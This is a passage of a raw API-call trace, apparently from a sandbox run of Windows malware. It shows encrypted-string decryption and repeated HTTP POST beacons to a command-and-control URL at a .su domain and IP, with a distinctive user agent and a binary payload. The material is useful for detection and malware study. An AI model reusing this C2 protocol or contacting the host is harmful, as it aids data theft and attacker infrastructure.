hHeap=0x5b0000) returned 1 [0271.183] GetProcessHeap () returned 0x5b0000 [0271.183] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5a20 | out: hHeap=0x5b0000) returned 1 [0271.183] closesocket (s=0x3c0) returned 0 [0271.184] GetProcessHeap () returned 0x5b0000 [0271.184] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa80 | out: hHeap=0x5b0000) returned 1 [0271.184] GetProcessHeap () returned 0x5b0000 [0271.184] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5b38 | out: hHeap=0x5b0000) returned 1 [0271.184] GetProcessHeap () returned 0x5b0000 [0271.185] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2f60 | out: hHeap=0x5b0000) returned 1 [0271.185] GetProcessHeap () returned 0x5b0000 [0271.185] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0271.186] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xc34) returned 0x3c0 [0271.188] Sleep (dwMilliseconds=0xea60) [0271.206] GetProcessHeap () returned 0x5b0000 [0271.207] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3470 [0271.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0271.209] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0271.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0271.222] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0271.230] GetProcessHeap () returned 0x5b0000 [0271.230] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0271.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0271.230] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0271.231] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0271.231] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0271.232] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0271.232] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0271.232] GetProcessHeap () returned 0x5b0000 [0271.233] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0271.234] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0271.234] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3470, pdwDataLen=0xdfcfc | out: pbData=0x5d3470, pdwDataLen=0xdfcfc) returned 1 [0271.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0271.237] CryptDestroyKey (hKey=0x5be288) returned 1 [0271.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0271.237] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0271.237] GetProcessHeap () returned 0x5b0000 [0271.237] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5b38 [0271.238] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0271.238] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0271.239] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0271.239] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0271.239] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0271.240] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0271.240] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0271.241] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0271.241] GetProcessHeap () returned 0x5b0000 [0271.241] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0271.241] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0271.241] GetProcessHeap () returned 0x5b0000 [0271.242] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0271.242] GetProcessHeap () returned 0x5b0000 [0271.242] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5b38 | out: hHeap=0x5b0000) returned 1 [0271.242] GetProcessHeap () returned 0x5b0000 [0271.242] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3470 | out: hHeap=0x5b0000) returned 1 [0271.242] GetProcessHeap () returned 0x5b0000 [0271.242] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2e40 [0271.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0271.243] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0271.247] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0271.248] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5a20) returned 1 [0271.266] GetProcessHeap () returned 0x5b0000 [0271.266] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8620 [0271.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0271.267] CryptImportKey (in: hProv=0x5c5a20, pbData=0x5c8620, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0271.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0271.268] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0271.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0271.268] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0271.268] GetProcessHeap () returned 0x5b0000 [0271.269] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8620 | out: hHeap=0x5b0000) returned 1 [0271.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0271.270] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2e40, pdwDataLen=0xdfcfc | out: pbData=0x5d2e40, pdwDataLen=0xdfcfc) returned 1 [0271.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0271.271] CryptDestroyKey (hKey=0x5bde08) returned 1 [0271.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0271.271] CryptReleaseContext (hProv=0x5c5a20, dwFlags=0x0) returned 1 [0271.271] GetProcessHeap () returned 0x5b0000 [0271.271] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d63d8 [0271.272] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0271.272] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0271.273] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0271.273] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0271.274] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0271.274] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0271.274] GetProcessHeap () returned 0x5b0000 [0271.274] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0271.274] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cda20*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf338*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0271.279] GetProcessHeap () returned 0x5b0000 [0271.279] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca990 [0271.279] socket (af=2, type=1, protocol=6) returned 0x3c4 [0271.279] connect (s=0x3c4, name=0x5cf338*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0271.351] FreeAddrInfoW (pAddrInfo=0x5cda20*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf338*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0271.351] GetProcessHeap () returned 0x5b0000 [0271.351] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5aa8 [0271.351] GetProcessHeap () returned 0x5b0000 [0271.351] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0271.352] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0271.353] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0271.353] GetProcessHeap () returned 0x5b0000 [0271.353] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0271.353] GetProcessHeap () returned 0x5b0000 [0271.353] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0271.353] GetProcessHeap () returned 0x5b0000 [0271.353] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d35d8 [0271.353] GetProcessHeap () returned 0x5b0000 [0271.353] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0271.354] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0271.355] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0271.355] GetProcessHeap () returned 0x5b0000 [0271.355] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0271.355] GetProcessHeap () returned 0x5b0000 [0271.355] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0271.355] send (s=0x3c4, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0271.357] send (s=0x3c4, buf=0x5d1e18*, len=159, flags=0) returned 159 [0271.357] GetProcessHeap () returned 0x5b0000 [0271.357] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0271.357] recv (in: s=0x3c4, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0272.566] GetProcessHeap () returned 0x5b0000 [0272.566] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0272.566] GetProcessHeap () returned 0x5b0000 [0272.566] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d35d8 | out: hHeap=0x5b0000) returned 1 [0272.566] GetProcessHeap () returned 0x5b0000 [0272.566] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0272.566] GetProcessHeap () returned 0x5b0000 [0272.567] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5aa8 | out: hHeap=0x5b0000) returned 1 [0272.567] closesocket (s=0x3c4) returned 0 [0272.567] GetProcessHeap () returned 0x5b0000 [0272.567] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca990 | out: hHeap=0x5b0000) returned 1 [0272.567] GetProcessHeap () returned 0x5b0000 [0272.568] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d63d8 | out: hHeap=0x5b0000) returned 1 [0272.568] GetProcessHeap () returned 0x5b0000 [0272.568] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0272.568] GetProcessHeap () returned 0x5b0000 [0272.568] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0272.573] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xc38) returned 0x3c4 [0272.575] Sleep (dwMilliseconds=0xea60) [0272.583] GetProcessHeap () returned 0x5b0000 [0272.583] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d32c0 [0272.583] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0272.584] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0272.592] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0272.593] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5aa8) returned 1 [0272.603] GetProcessHeap () returned 0x5b0000 [0272.603] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0272.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0272.609] CryptImportKey (in: hProv=0x5c5aa8, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0272.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0272.610] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0272.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0272.611] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0272.611] GetProcessHeap () returned 0x5b0000 [0272.612] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0272.612] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0272.613] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d32c0, pdwDataLen=0xdfcfc | out: pbData=0x5d32c0, pdwDataLen=0xdfcfc) returned 1 [0272.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0272.614] CryptDestroyKey (hKey=0x5be288) returned 1 [0272.614] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0272.615] CryptReleaseContext (hProv=0x5c5aa8, dwFlags=0x0) returned 1 [0272.615] GetProcessHeap () returned 0x5b0000 [0272.615] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d4e48 [0272.615] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0272.616] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0272.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0272.617] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0272.617] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0272.618] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0272.618] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0272.619] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0272.619] GetProcessHeap () returned 0x5b0000 [0272.619] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb1a0 [0272.619] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0272.619] GetProcessHeap () returned 0x5b0000 [0272.620] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb1a0 | out: hHeap=0x5b0000) returned 1 [0272.620] GetProcessHeap () returned 0x5b0000 [0272.620] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d4e48 | out: hHeap=0x5b0000) returned 1 [0272.620] GetProcessHeap () returned 0x5b0000 [0272.620] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d32c0 | out: hHeap=0x5b0000) returned 1 [0272.620] GetProcessHeap () returned 0x5b0000 [0272.620] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3500 [0272.621] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0272.625] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0272.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0272.631] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5dd8) returned 1 [0272.641] GetProcessHeap () returned 0x5b0000 [0272.641] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0272.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0272.642] CryptImportKey (in: hProv=0x5c5dd8, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0272.643] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0272.643] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0272.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0272.644] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0272.644] GetProcessHeap () returned 0x5b0000 [0272.645] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0272.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0272.646] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3500, pdwDataLen=0xdfcfc | out: pbData=0x5d3500, pdwDataLen=0xdfcfc) returned 1 [0272.649] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0272.649] CryptDestroyKey (hKey=0x5bde08) returned 1 [0272.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0272.650] CryptReleaseContext (hProv=0x5c5dd8, dwFlags=0x0) returned 1 [0272.650] GetProcessHeap () returned 0x5b0000 [0272.650] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d56e8 [0272.651] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0272.651] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0272.652] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0272.652] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0272.653] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0272.653] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0272.653] GetProcessHeap () returned 0x5b0000 [0272.653] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0272.653] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cde58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf338*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0272.655] GetProcessHeap () returned 0x5b0000 [0272.655] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca940 [0272.656] socket (af=2, type=1, protocol=6) returned 0x3c8 [0272.656] connect (s=0x3c8, name=0x5cf338*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0272.728] FreeAddrInfoW (pAddrInfo=0x5cde58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf338*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0272.728] GetProcessHeap () returned 0x5b0000 [0272.728] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5888 [0272.728] GetProcessHeap () returned 0x5b0000 [0272.728] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0272.729] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0272.730] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0272.730] GetProcessHeap () returned 0x5b0000 [0272.730] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0272.730] GetProcessHeap () returned 0x5b0000 [0272.731] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0272.731] GetProcessHeap () returned 0x5b0000 [0272.731] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3080 [0272.731] GetProcessHeap () returned 0x5b0000 [0272.731] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0272.731] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0272.732] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0272.732] GetProcessHeap () returned 0x5b0000 [0272.732] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0272.732] GetProcessHeap () returned 0x5b0000 [0272.733] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0272.733] send (s=0x3c8, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0272.733] send (s=0x3c8, buf=0x5d1e18*, len=159, flags=0) returned 159 [0272.733] GetProcessHeap () returned 0x5b0000 [0272.733] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0272.733] recv (in: s=0x3c8, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0273.931] GetProcessHeap () returned 0x5b0000 [0273.932] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0273.932] GetProcessHeap () returned 0x5b0000 [0273.933] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3080 | out: hHeap=0x5b0000) returned 1 [0273.933] GetProcessHeap () returned 0x5b0000 [0273.933] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0273.933] GetProcessHeap () returned 0x5b0000 [0273.934] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5888 | out: hHeap=0x5b0000) returned 1 [0273.934] closesocket (s=0x3c8) returned 0 [0273.935] GetProcessHeap () returned 0x5b0000 [0273.935] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca940 | out: hHeap=0x5b0000) returned 1 [0273.935] GetProcessHeap () returned 0x5b0000 [0273.935] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d56e8 | out: hHeap=0x5b0000) returned 1 [0273.935] GetProcessHeap () returned 0x5b0000 [0273.936] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3500 | out: hHeap=0x5b0000) returned 1 [0273.936] GetProcessHeap () returned 0x5b0000 [0273.936] HeapFree (in: hHeap=0x5b0000, 